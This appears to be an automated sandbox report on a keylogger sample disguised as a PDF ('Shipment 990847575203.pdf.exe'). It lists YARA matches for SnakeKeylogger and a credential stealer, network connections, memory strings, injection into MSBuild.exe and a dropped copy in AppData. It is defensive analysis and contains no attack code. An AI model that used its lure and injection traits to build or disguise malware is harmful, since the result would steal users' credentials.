                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49768 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: Shipment 990847575203.pdf.exe
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_0185DE840_2_0185DE84
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07C9D4880_2_07C9D488
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07C9E2400_2_07C9E240
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07C9C1980_2_07C9C198
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07C9D8C00_2_07C9D8C0
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07CA11FC0_2_07CA11FC
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07CA89300_2_07CA8930
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07CA2A970_2_07CA2A97
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07ED31100_2_07ED3110
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_07ED18210_2_07ED1821
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00A97C119_2_00A97C11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00A94E1C9_2_00A94E1C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00A9C7D09_2_00A9C7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00A97C319_2_00A97C31
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00A92D549_2_00A92D54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBC1A79_2_00CBC1A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBD2849_2_00CBD284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBC4779_2_00CBC477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBC73F9_2_00CBC73F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBE9889_2_00CBE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB69A09_2_00CB69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBCCE79_2_00CBCCE7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB9DE09_2_00CB9DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB6FC89_2_00CB6FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBCFB79_2_00CBCFB7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB53819_2_00CB5381
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBE9879_2_00CBE987
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBF9749_2_00CBF974
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB3AC79_2_00CB3AC7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CBCA199_2_00CBCA19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB3A249_2_00CB3A24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB3B619_2_00CB3B61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB3B159_2_00CB3B15
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB3E099_2_00CB3E09
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_016EDE8410_2_016EDE84
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_076B50C010_2_076B50C0
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_076BD48810_2_076BD488
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_076BE24010_2_076BE240
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_076BC19810_2_076BC198
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_076BD8C010_2_076BD8C0
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_076C11FC10_2_076C11FC
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_076C893010_2_076C8930
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_076C2A9010_2_076C2A90
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_0BB90B2010_2_0BB90B20
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeCode function: 10_2_0BB9251010_2_0BB92510
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0119318817_2_01193188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_01194E1C17_2_01194E1C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0119307017_2_01193070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0119608017_2_01196080
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0119C7D017_2_0119C7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_01192D5417_2_01192D54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_01197C1117_2_01197C11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBD27817_2_02EBD278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EB536217_2_02EB5362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBA08817_2_02EBA088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBC14617_2_02EBC146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EB711817_2_02EB7118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBC73817_2_02EBC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBC46817_2_02EBC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBCA0817_2_02EBCA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EB69A017_2_02EB69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBE98817_2_02EBE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBCFAA17_2_02EBCFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBCCD817_2_02EBCCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EB3AC817_2_02EB3AC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EB3A2417_2_02EB3A24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EB3B6117_2_02EB3B61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EB3B1517_2_02EB3B15
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBF96117_2_02EBF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EBE97A17_2_02EBE97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02EB3E0917_2_02EB3E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB1E8017_2_06AB1E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABE25817_2_06ABE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB17A017_2_06AB17A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB0B3017_2_06AB0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB502817_2_06AB5028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB9C1817_2_06AB9C18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABFC6817_2_06ABFC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB296817_2_06AB2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB954817_2_06AB9548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABE6A017_2_06ABE6A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABE6B017_2_06ABE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABEAF817_2_06ABEAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABDE0017_2_06ABDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB1E7717_2_06AB1E77
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABE24B17_2_06ABE24B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB8BA017_2_06AB8BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABF3B817_2_06ABF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB179317_2_06AB1793
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB0B2017_2_06AB0B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABEB0817_2_06ABEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABEF6017_2_06ABEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABEF5117_2_06ABEF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABCCA017_2_06ABCCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABD0E917_2_06ABD0E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABD0F817_2_06ABD0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABF80317_2_06ABF803
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB000717_2_06AB0007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB501B17_2_06AB501B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABF81017_2_06ABF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB001417_2_06AB0014
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB004017_2_06AB0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABD9A817_2_06ABD9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABD99917_2_06ABD999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABDDFF17_2_06ABDDFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABD54017_2_06ABD540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06ABD55017_2_06ABD550
                  Source: Shipment 990847575203.pdf.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: FZcXKpA.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2438850079.0000000007B70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2419769036.000000000157E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2421064302.000000000330C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2421064302.00000000032F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000000.2323378587.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHQOL.exe4 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2440674373.0000000008050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exeBinary or memory string: OriginalFilenameHQOL.exe4 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Shipment 990847575203.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: FZcXKpA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jynCmXCF47q9Whp0rl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jynCmXCF47q9Whp0rl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@6/6
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeFile created: C:\Users\user\AppData\Roaming\FZcXKpA.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
